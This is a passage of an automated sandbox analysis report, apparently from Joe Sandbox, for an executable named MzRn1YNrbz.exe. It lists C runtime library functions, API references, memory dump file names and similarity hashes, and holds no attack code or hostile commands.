_free.LIBCMT ref: 00F16572
_free.LIBCMT ref: 00F165B0
_free.LIBCMT ref: 00F165B9
_free.LIBCMT ref: 00F165C5

Strings

C, xrefs: 00F163CA

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 736496ec1b1f329430c1e45d199586d7bfc54bda2392930000497c7c876c5bdb
Instruction ID: 633eb874a2c586226d64a92cf1da836a3b225917c8704b87b0db439f462b3e53
Opcode Fuzzy Hash: 736496ec1b1f329430c1e45d199586d7bfc54bda2392930000497c7c876c5bdb
Instruction Fuzzy Hash: 1AB1367590121A9BDB24DF18C884AE9B7B5FB48314F5485AAE84AA7390E731AED0DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00F21029 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F20D75: _free.LIBCMT ref: 00F20D9A

_free.LIBCMT ref: 00F21077

Part of subcall function 00F1799F: HeapFree.KERNEL32(00000000,00000000,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?), ref: 00F179B5
Part of subcall function 00F1799F: GetLastError.KERNEL32(?,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?,?), ref: 00F179C7

_free.LIBCMT ref: 00F21082
_free.LIBCMT ref: 00F2108D
_free.LIBCMT ref: 00F210E1
_free.LIBCMT ref: 00F210EC
_free.LIBCMT ref: 00F210F7
_free.LIBCMT ref: 00F21102

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bd439c22b8cec716c55c58b2ed72c3994e2363fc0ddae79c41a67ab1848653ea
Instruction ID: 69628bcf9536bc5b86a6efe908837060a93f0ea74828599b0b0883b442a8ed01
Opcode Fuzzy Hash: bd439c22b8cec716c55c58b2ed72c3994e2363fc0ddae79c41a67ab1848653ea
Instruction Fuzzy Hash: CF114F72941B18BAE520B7B0DC07FCBB7AD6F00700F800815B29D660ABDEB9B544E692

Uniqueness

Uniqueness Score: -1.00%

Function 00F09CF3 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00F09CFA
std::_Lockit::_Lockit.LIBCPMT ref: 00F09D04
int.LIBCPMTD ref: 00F09D1B

Part of subcall function 00F01E70: std::_Lockit::_Lockit.LIBCPMT ref: 00F01E86
Part of subcall function 00F01E70: std::_Lockit::~_Lockit.LIBCPMT ref: 00F01EB0

codecvt.LIBCPMT ref: 00F09D3E
std::_Facet_Register.LIBCPMT ref: 00F09D55
std::_Lockit::~_Lockit.LIBCPMT ref: 00F09D75
Concurrency::cancel_current_task.LIBCPMTD ref: 00F09D82

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 765eeb93343bd8e9afaf544bde6bc6a09da9968cdff93fee5e4830a428612a76
Instruction ID: 71c3fa94d7e927873e4b8657ff79be814162969dce2aae334a2bfee345a98c31
Opcode Fuzzy Hash: 765eeb93343bd8e9afaf544bde6bc6a09da9968cdff93fee5e4830a428612a76
Instruction Fuzzy Hash: B30122319442148FCB15EB64DD46ABFBBA1AF80320F144009F5216B2C2EFBC9E00F780

Uniqueness

Uniqueness Score: -1.00%

Function 00F1A654 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00F1A69C
__fassign.LIBCMT ref: 00F1A881
__fassign.LIBCMT ref: 00F1A89E
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F1A8E6
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F1A926
GetLastError.KERNEL32 ref: 00F1A9CE

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 2cfe2a77b0930550dac4c7999d5e51beccd29aca4f33fb07b4342055d3f8b81e
Instruction ID: bd8eba2d158f9cfdd614c63480381b03c4622550602ba582c0aff84e641b3bdc
Opcode Fuzzy Hash: 2cfe2a77b0930550dac4c7999d5e51beccd29aca4f33fb07b4342055d3f8b81e
Instruction Fuzzy Hash: 2DC1BF75D012589FCF15CFE8C8809EDBBB5AF48314F28816AE865F7241E6319E82DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F04DD0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 369COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00F04E89
_strcspn.LIBCMT ref: 00F04ED6
task.LIBCPMTD ref: 00F0520A
task.LIBCPMTD ref: 00F05212

Strings

@, xrefs: 00F05076

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _strcspntask
String ID: @
API String ID: 2935182443-2766056989
Opcode ID: 5a26f8a16373375d010ae94c18a48b6bb335b54e7f07fba4ab8c05834d582fc7
Instruction ID: 9d6b4d9873c18f53ca6aa575e3b76c9dfd747d12d7415dd2a4edd0eccb24f5c0
Opcode Fuzzy Hash: 5a26f8a16373375d010ae94c18a48b6bb335b54e7f07fba4ab8c05834d582fc7
Instruction Fuzzy Hash: F8F15BB1E002499FCB18DF98DC91AEEBBB9BF48300F148159F509AB295D734AD41EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F0E6EA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F0E6E1,00F0D1C2,00F0C540), ref: 00F0E6F8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F0E706
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F0E71F
SetLastError.KERNEL32(00000000,00F0E6E1,00F0D1C2,00F0C540), ref: 00F0E771

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2670b17ab1112147402ebf5b0eaa293648cbdee46889d6df7688cc43d3b69e63
Instruction ID: 7a21aa7a9868bc20d2bc5fbdb2897b0728d4d68e2ec2c1bd1358c41c78193ba4
Opcode Fuzzy Hash: 2670b17ab1112147402ebf5b0eaa293648cbdee46889d6df7688cc43d3b69e63
Instruction Fuzzy Hash: 4C01A732A097156EEB3825747C8576A3BA8EB417B97200639F530A61E6EF594CC5B340

Uniqueness

Uniqueness Score: -1.00%

Function 00F1F04F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 00F1F09D
_free.LIBCMT ref: 00F1F1E9

Strings

*?, xrefs: 00F1F092

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 946a4d68bbeded821d8212fbd439c791aa41b7c9409a92bece3b8cc147135194
Instruction ID: acc1fd9cf09fe34f184f368426366b0d9b4d1c79d1c88ae759db7d5e82a00055
Opcode Fuzzy Hash: 946a4d68bbeded821d8212fbd439c791aa41b7c9409a92bece3b8cc147135194
Instruction Fuzzy Hash: AE613D76E00219AFDB14DFA9C8815EDFBF5EF48320B24816AE805F7301D675AE859B90

Uniqueness

Uniqueness Score: -1.00%

Function 00F1F614 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\MzRn1YNrbz.exe, xrefs: 00F1F619

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\MzRn1YNrbz.exe
API String ID: 0-633649950
Opcode ID: bd59aa8ec725e7c14b56bfad60ed2b11ca1dcb132e7dc401040b9d05e96ebdce
Instruction ID: 02d87ad6058c53135ba65b8fb689a289ad67f426fe9b3cf0c765b9dac28c411c
Opcode Fuzzy Hash: bd59aa8ec725e7c14b56bfad60ed2b11ca1dcb132e7dc401040b9d05e96ebdce
Instruction Fuzzy Hash: 6521D171A00209BF9B20AF618C819EB77ADEF403B47104534F9A9D7160E739ECC5BBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F0F782 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00F0F843,?,?,011AA574,00000000,?,00F0F96E,00000004,InitializeCriticalSectionEx,0118ABA4,InitializeCriticalSectionEx,00000000), ref: 00F0F812

Strings

api-ms-, xrefs: 00F0F7D2

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 6ee1d5823d92cfdf82e9dbed808d66af5661e52a6cdda5eb3e6f629a5bcd38a0
Instruction ID: 149c880da558371d86b609864067b177c3db3324199476172ed9b46b47c559bf
Opcode Fuzzy Hash: 6ee1d5823d92cfdf82e9dbed808d66af5661e52a6cdda5eb3e6f629a5bcd38a0
Instruction Fuzzy Hash: 09110636E40225ABCB328A68AC40B9D73D89F01770F258230E914EB6C4D770ED48B7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F151E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F151DC,00000006,?,00F151A4,?,?,00000006), ref: 00F151FC
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F1520F
FreeLibrary.KERNEL32(00000000,?,?,00F151DC,00000006,?,00F151A4,?,?,00000006), ref: 00F15232

Strings

CorExitProcess, xrefs: 00F15207
mscoree.dll, xrefs: 00F151F5

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8df7963311d0221cf573dce1a6276a7380abab36a3be2e07ea80c633f1597dbf
Instruction ID: e6c11bb2dc772fe214f3d43d0edc722e1f9172e8f0c914af7274dc70c9c71243
Opcode Fuzzy Hash: 8df7963311d0221cf573dce1a6276a7380abab36a3be2e07ea80c633f1597dbf
Instruction Fuzzy Hash: 37F0A73194161DFBCB25AB51DC49BED7B79EB84B6AF104064F405B1150CB708E81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F266A5 Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0144E6A0,0144E6A0,?,7FFFFFFF,?,?,00F26961,0144E6A0,0144E6A0,?,0144E6A0,?,?,?,?,0144E6A0), ref: 00F26748
__alloca_probe_16.LIBCMT ref: 00F267FE
__alloca_probe_16.LIBCMT ref: 00F26894
__freea.LIBCMT ref: 00F268FF
__freea.LIBCMT ref: 00F2690B

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 7d2e1e20ea4f289f7e91525b7e4bd8a12f757e06f33ef97668a9c4e4f830e7b8
Instruction ID: f40d6823cd8a955afb62c10fea13c5e3535fb3167b08383e3044d0f908d87cc4
Opcode Fuzzy Hash: 7d2e1e20ea4f289f7e91525b7e4bd8a12f757e06f33ef97668a9c4e4f830e7b8
Instruction Fuzzy Hash: 3781C672D0026A9BDF209FA4EC51AEE7BB9DF09764F280155E804EB181DB35CD80F7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F1D07C Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00F1D100
__alloca_probe_16.LIBCMT ref: 00F1D1C6
__freea.LIBCMT ref: 00F1D232

Part of subcall function 00F1845A: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F1D6D2,?,00000000,?,00F22956,?,00000004,00000000,?,?,?,00F16BBE), ref: 00F1848C

__freea.LIBCMT ref: 00F1D23B
__freea.LIBCMT ref: 00F1D25E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 91e477d22f0df38f08be294cba8be4a82d2aa7c6193ede42141c3a914a04617e
Instruction ID: 8523d4652ea7da9124d1825f881a5d45e4cb66469e931497a922bca4b76d936e
Opcode Fuzzy Hash: 91e477d22f0df38f08be294cba8be4a82d2aa7c6193ede42141c3a914a04617e
Instruction Fuzzy Hash: 2F51D272900246BFEB219E64CC41EFB77B9DF49760F250669FD14A7140DB39DC81B660

Uniqueness

Uniqueness Score: -1.00%

Function 00F03A00 Relevance: 7.7, APIs: 5, Instructions: 167COMMON

Download Yara Rule

APIs

shared_ptr.LIBCMTD ref: 00F03A9E
task.LIBCPMTD ref: 00F03AA6

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: shared_ptrtask
String ID:
API String ID: 810089379-0
Opcode ID: 9209e1a3f77838fa979a323e04cf1c96822bbf7f1cc0334c2c3e7a17414887a6
Instruction ID: b7ab7499ec5fd38f1e6645862dde4039bcb2701c9dae6dddebc0c352a8efbe21
Opcode Fuzzy Hash: 9209e1a3f77838fa979a323e04cf1c96822bbf7f1cc0334c2c3e7a17414887a6
Instruction Fuzzy Hash: 9661DBB1D002499FCB04EF94DD95AEEB7B9AF48300F108119F515AB2D5DB38AE05EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F08820 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F0882B
int.LIBCPMTD ref: 00F0883D

Part of subcall function 00F01E70: std::_Lockit::_Lockit.LIBCPMT ref: 00F01E86
Part of subcall function 00F01E70: std::_Lockit::~_Lockit.LIBCPMT ref: 00F01EB0

Concurrency::cancel_current_task.LIBCPMTD ref: 00F0887D
std::_Lockit::~_Lockit.LIBCPMT ref: 00F088D6

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 2e5b41ef782ce178eecc1a0c5d6e3fec28489505776da69366fca71f76ab75a2
Instruction ID: 080e8b947a4045f301fce158b9611575a7b77540330b46b59dedd3f9d772e4f6
Opcode Fuzzy Hash: 2e5b41ef782ce178eecc1a0c5d6e3fec28489505776da69366fca71f76ab75a2
Instruction Fuzzy Hash: CC212875D00108EFCB08EFA4C881AEEBBB4AF44300F508169E415672D5EB386E45FF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F20AFE Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F20B16

Part of subcall function 00F1799F: HeapFree.KERNEL32(00000000,00000000,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?), ref: 00F179B5
Part of subcall function 00F1799F: GetLastError.KERNEL32(?,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?,?), ref: 00F179C7

_free.LIBCMT ref: 00F20B28
_free.LIBCMT ref: 00F20B3A
_free.LIBCMT ref: 00F20B4C
_free.LIBCMT ref: 00F20B5E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4554ca7d41bc14ff081ab6b6579fc5a0d89aa32e6e8bbfee11e02d3638a280b0
Instruction ID: 60857a3d8ae82b7d0faa017888f37c343fe95f983dc41dcdd47b6646e14852a0
Opcode Fuzzy Hash: 4554ca7d41bc14ff081ab6b6579fc5a0d89aa32e6e8bbfee11e02d3638a280b0
Instruction Fuzzy Hash: 36F06273A04314AB8638EB68F486C46BBEAAA447387E4181DF01CD7586CB34FCC0A764

Uniqueness

Uniqueness Score: -1.00%

Function 00F18E78 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F18F02

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f7404dd3ab26c242233e537ad71a7054255a5078c486d798eb9e1fbb6c486586
Instruction ID: 0954e7266f16b1dd4b1393265207d74440cc677b1c0bfa99cae01b1d515681f5
Opcode Fuzzy Hash: f7404dd3ab26c242233e537ad71a7054255a5078c486d798eb9e1fbb6c486586
Instruction Fuzzy Hash: 4CB16932D08286AFDB15CF28C851BEEBBF5EF59350F144169E845EB241D6748D82E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F0E801 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F0E8C8
___AdjustPointer.LIBCMT ref: 00F0E8EB
___AdjustPointer.LIBCMT ref: 00F0E987

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 09d27cfe9e38c0dd7e270a51baad02eb495b597e0244518cf415a83d0c1928bc
Instruction ID: b30ee79c3eaa0c361eb577727f1b3ccd9f35ddd973cc3621190351e1aefd7749
Opcode Fuzzy Hash: 09d27cfe9e38c0dd7e270a51baad02eb495b597e0244518cf415a83d0c1928bc
Instruction Fuzzy Hash: E451F072A05206AFEB288F54D941BBAB7A4EF54720F14892DEC41472D1E735ED80FB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F1EF80 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00F143C4: _free.LIBCMT ref: 00F143D2

Part of subcall function 00F1EB3B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00F1D228,?,00000000,00000000), ref: 00F1EBE7

GetLastError.KERNEL32 ref: 00F1EFE8
__dosmaperr.LIBCMT ref: 00F1EFEF
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00F1F02E
__dosmaperr.LIBCMT ref: 00F1F035

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 49d78b5005185597dc9661078bc7af1705a2251eb7a1bae99d82475946d7bc2d
Instruction ID: 3e1f5359e5a2d4f39188ff1e51b36cb2bc42a87fbabb25669fefe4981aa30924
Opcode Fuzzy Hash: 49d78b5005185597dc9661078bc7af1705a2251eb7a1bae99d82475946d7bc2d
Instruction Fuzzy Hash: 42210671A00605AFDB209F618CC19EBB7ADEF643743148524FC2597141D738ECC5B7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F18AC7 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

